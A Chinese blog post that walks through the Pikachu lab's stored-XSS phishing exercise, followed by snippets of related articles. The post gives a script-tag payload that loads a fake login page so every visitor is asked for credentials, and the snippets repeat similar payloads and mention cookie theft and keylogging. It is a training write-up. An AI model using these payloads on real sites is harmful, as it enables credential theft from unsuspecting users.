Pikachu-xss实验案例-钓鱼

已于 2024-10-03 00:42:59 修改
阅读量288 收藏
点赞数 1
CC 4.0 BY-SA版权
文章标签: xss 前端
于 2024-10-03 00:42:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/guanrongl/article/details/142685339

攻击思路:提供一个与攻击网站相似的登陆的钓鱼页面;让用户输入登陆信息

查看项目源代码,首先访问 fish.php ,提供输入的登陆框,

从登陆框获取到账号、密码后,重定向到xfish.php 做保存;

因此,需要一个payload,让他跳转到fish.php 页面; 使用xss 的存储型 漏洞,构造payload,弹出输入账号、密码的窗口

<script src="http://192.168.3.224:8082/pkxss/xfish/fish.php"></script>

弹出登录框,存储型xss ,后续每次用户访问 xss_stored.php页面,都会弹出登录框,诱导用户输入账号密码;从而获取用户的账号信息。

Pikachu-XSS漏洞之cookie值获取、钓鱼结果和键盘记录实战记录
m0_74608722的博客
08-17 2564
我们可以向用户发送一个链接请求,用户点击后会给我们提前搭建好的后台发出一个请求,后台收到请求后会返回一个身份信息验证的Basic头部,如果用户安全意识不够,输入了敏感信息:用户名和密码,然后这些就会被发送到pkxss后台。首先我们登录进去,我们发现界面和get型的是完全一样的,我们随便输入点东西:发现并没有在url里面显示,那怎么回事那,其实这个就是post型的,请求是通过post的方式发送的。**好了,所有的Pikachu模块我们都已经练习完了,但是还遗留下一些实战训练,我们今天就来一口气完成!
pikachu漏洞靶机之xss漏洞xss钓鱼
weixin_43803070的博客
06-01 2910
跨站脚本漏洞测试流程 ① 在目标站点上找到输入点,比如查询接口,留言板等; ② 输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理; ③ 通过搜索定位到唯一字符,结合唯一字符前后语法确认是否可以构造执行js的条件(构造闭合); ④ 提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞; TIPS: 1.一般查询接口容易出现反射...
Pikachu靶场-xss详解
qq_53083285的博客
10-30 8127
Picachu靶场-xss跨站脚本漏洞概述跨站脚本漏洞类型及测试流程反射型XSS(post&get)存储型XSSDom型XSSxss-获取cookiexss-进行钓鱼xss-获取键盘记录xss盲打xss的过滤和绕过xss输出在href和js中的案例xss的防范措施 XSS-跨站脚本漏洞目录 跨站脚本漏洞概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS;
【web-ctf】ctf-pikachu-XSS
一个努力生活的人的博客
06-27 2966
XSS-pikachu
1、pikachu靶场之xss钓鱼复现
weixin_51520483的博客
05-24 803
1、fish.php:文件源码分析,这是恶意构造的页面,即恶意插入xss代码中的url:127.0.0.1/pkxss/xfish/fish.php。2、此时恶意代码已经存入数据库,并存在网页中,当另一个用户打开这个网页时,就会触发xss恶意代码,被跳转的另一个页面,并弹出登入框。1、在含有xss漏洞页面,插入一个一个恶意script代码,代码会触发跳转页到恶意页面。2、xfish.php:他会获取到传入过来的账号密,并将这些存入数据库。3、这个时候如果输入账号密码,就会被恶意构造的后台窃取储存。
day35WEB 攻防-通用漏洞&XSS 跨站&反射&存储&DOM&Beef-XSS
m0_69583059的博客
01-29 1337
本章知识点:1XSS跨站原理攻击分类等2XSS跨站反射型存储型&DOM型等3XSS跨站攻击手法劫持盗取凭据等4XSS跨站攻击项目&XSS平台&Beef-XSS
PikachuXSS漏洞实战:偷Cookie
m0_58442919的博客
02-11 730
XSS漏洞的威力远超我们的想象——从偷Cookie,攻击者可以轻松窃取用户隐私,甚至完全控制账户。通过今天的实验,我们不仅理解了XSS的利用方式,也深刻认识到输入过滤和输出转义的重要性。“永远不要相信用户输入的数据!无论是前端还是后端,只有严格过滤和转义,才能让XSS漏洞无处藏身。
17-xss漏洞
qq_56414082的博客
03-29 898
onload 事件会在页面或图像加载完成后立即发生。onload 通常用于 元素,在页面完全载入后(包括图片、css文件等等。)执行脚本代码。Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透;BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单。启动BeFF-XSS并登陆进去可以通过命令也可以图形化页面。
pikachuxss
qq_43665434的博客
01-31 789
pikachuxss XSS 跨站脚本漏洞概述 原因 形成xss的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输出到前端时被浏览器当作有效代码解析执行从而产生危害。 地位 一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位 危害对象 xss是一种发生在web前端的漏洞,所以其危害的对象也主要是前端用户 危害 可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取。 设置可以结合浏览器自身的漏洞对用户主机进行远程控制 攻击流程 插
WEB 攻防-通用漏-XSS 跨站脚本攻击-反射型/存储型/DOM&BEEF-XSS
weixin_45534587的博客
01-12 1313
XSS攻击,全称为跨站脚本攻击,是指攻击者通过在网页中插入恶意脚本代码,当用户浏览该网页时,恶意脚本会被执行,从而达到攻击目的的一种安全漏洞。这些恶意脚本可以窃取用户的敏感信息,如Cookie、会话令牌等,或者诱导用户执行不安全的操作,如点击恶意链接、下载恶意软件等。
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3603
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
pikachu平台之xss漏洞
qq_42728977的博客
12-16 3211
反射型xss(get) 原理 传递的参数直接存在页面代码中,而且没有过滤 流程 打开页面 发现有长度限制,F12进行修改 。 输入特殊字符,检查是否有过滤 发现并没有过滤,而且直接在页面代码中了 存在xss漏洞,尝试输入<script>alert(xss)</script>,发现有长度限制,用F12修改后。 反射型xss(post) ...
防止包含 XSS 攻击风险的内容提交成功
最新发布
qq_37159134的博客
07-29 129
输入字符串清理后的安全字符串
【HTTP】防XSS+SQL注入:自定义HttpMessageConverter过滤链深度解决方案
夜雨的博客
07-28 278
XSS+SQL注入:自定义HttpMessageConverter过滤链深度解决方案
js面试题 高频(12-22题)
m0_63472757的博客
07-29 577
1.代码服用与抽象: 高阶函数可以将重复的逻辑抽象出来,形成通用函数,提高代码的复用性,柯李华可以将复杂的函数调用转化为一系列简单的步骤,便于部分应用和服用2.函数组合: 高阶函数和柯里化是构建函数式编程风格的关键,它们使的函数的组合变得更容易,从而构建更复杂的功能3.延迟执行与配置化: 柯里化可以将函数执行延迟到所有参数都传入后进行,同时允许在传入部分参数时进行配置,生成定制化的新函数。
vue3卡片垂直无限滚动
qq_63605379的博客
07-28 189
主要是利用css动画向上滚动,js动态计算dom上有多少条数据实时更新滚动速度。js 要在onMounted里调用确保dom已经被渲染。
基于Vue3.0+Express的前后端分离的任务清单管理系统
WwLK123的博客
07-28 171
该项目是一个待办事项管理系统,主要功能包括任务统计展示、待办事项管理、分类管理和成员管理。前端界面展示了首页任务量统计面板(总任务数、已完成/未完成数)、任务清单、分类管理和成员管理页面。系统采用Vue3+Element Plus开发,通过axios与后端API交互,实现数据动态加载和操作反馈。核心功能包含任务添加(支持项目编号、标题、分类选择、时间设置和成员分配)、分类维护和成员管理等功能,并配有表单验证和操作提示机制。
24. 了解过 webp 吗
weixin_64684095的博客
07-28 870
一种图片格式WebP(发音为 “weppy”)是由 Google 推出的一种现代图片格式,支持有损压缩和无损压缩,旨在提供更小的文件体积和更高质量的图像显示。透明通道(Alpha 通道)动画支持(类似 GIF)有损压缩(类似 JPEG)无损压缩(类似 PNG)特性说明格式类型有损/无损压缩、支持透明、动画优势更小体积、更高质量、更好压缩率使用方式<img><picture>、CSS、构建工具推荐场景图片优化、移动端、SEO 提升注意事项。
Nuxt 4:前端开发的全新篇章
weixin_43073383的博客
07-26 1005
Nuxt 4正式发布,带来了一系列性能优化和开发体验提升。新版框架内置Nitro 3.0服务器引擎,显著缩短冷启动时间并减小打包体积,同时增强跨平台兼容性。深度集成Vue 3.5和Vite 5.x,提供更快的渲染性能和开发速度。改进的DevTools提供直观的调试界面和性能分析工具。统一的打包策略简化了构建流程,而增强的模块化支持使生态系统更具扩展性。Nuxt 4延续了零配置启动、自动导入等优势,并优化了SSR/SSG能力,是构建高性能Web应用的理想选择。教程部分详细介绍了从环境准备到项目初始化的完整流程
pikachuxss钓鱼
03-04
### Pikachu XSS 钓鱼攻击原理 跨站脚本(XSS)漏洞允许攻击者向网页注入恶意脚本,这些脚本会在其他用户的浏览器中执行。对于反射型XSS,在用户请求被处理并返回给客户端之前,服务器会将未经适当验证或转义的数据嵌入到响应页面中[^1]。 存储型XSS则涉及持久保存于数据库或其他后端系统的恶意数据,当受害者访问受影响的应用程序部分时触发该代码执行[^2]。 #### 反射型XSS实例 考虑`http://10.0.0.101:90/pikachu/vul/xss/xss_reflected_get.php`这样的URL参数未经过滤就直接显示在HTML输出里的情况。如果存在如下链接: ```html <a href="http://10.0.0.101:90/pikachu/vul/xss/xss_reflected_get.php?name=<script>alert('XSS')</script>">点击这里</a> ``` 一旦用户点击此链接,则其浏览器将会加载目标站点并将提供的名称作为查询字符串的一部分发送出去;由于缺乏足够的防护措施,这会导致JavaScript弹窗被执行。 #### 存储型XSS案例 更进一步地看存储型的例子,假设有一个评论区功能允许提交包含HTML标签的内容,并且这些内容会被存入数据库并在后续展示给所有访客查看。此时如果有用户输入了类似于下面的代码片段: ```html <script src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php"></script> ``` 那么每当有新访客浏览含有这条记录的文章列表页或者其他任何地方读取到了这段JS文件路径的时候,就会自动下载并运行来自指定位置上的外部资源——即所谓的“钓鱼页面”,它可能模仿合法网站界面来欺骗用户提供敏感信息如登录凭证等。 ### 防御方法 为了防止上述类型的攻击发生,应该采取以下几种策略之一或多组合起来使用: - **输入过滤**:确保所有的用户输入都通过严格的正则表达式匹配来进行预处理,拒绝不符合预期模式的数据项。 - **上下文感知编码**:依据最终呈现的位置不同而采用相应的字符实体转换方式,比如用于属性值内的双引号应当变成 `"` 或者单引号变为 `'` ,以此类推。 - **HTTP头部设置**:利用Content Security Policy (CSP) 来声明哪些来源是可以信任的安全域外联接点,从而阻止非法脚本加载尝试。 - **框架自带机制**:现代Web开发库通常内置了一些安全特性,默认情况下能够帮助开发者减少许多常见的安全隐患风险。 ```javascript // 使用模板引擎中的转义函数 templateEngine.render('<%= user_input %>'); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值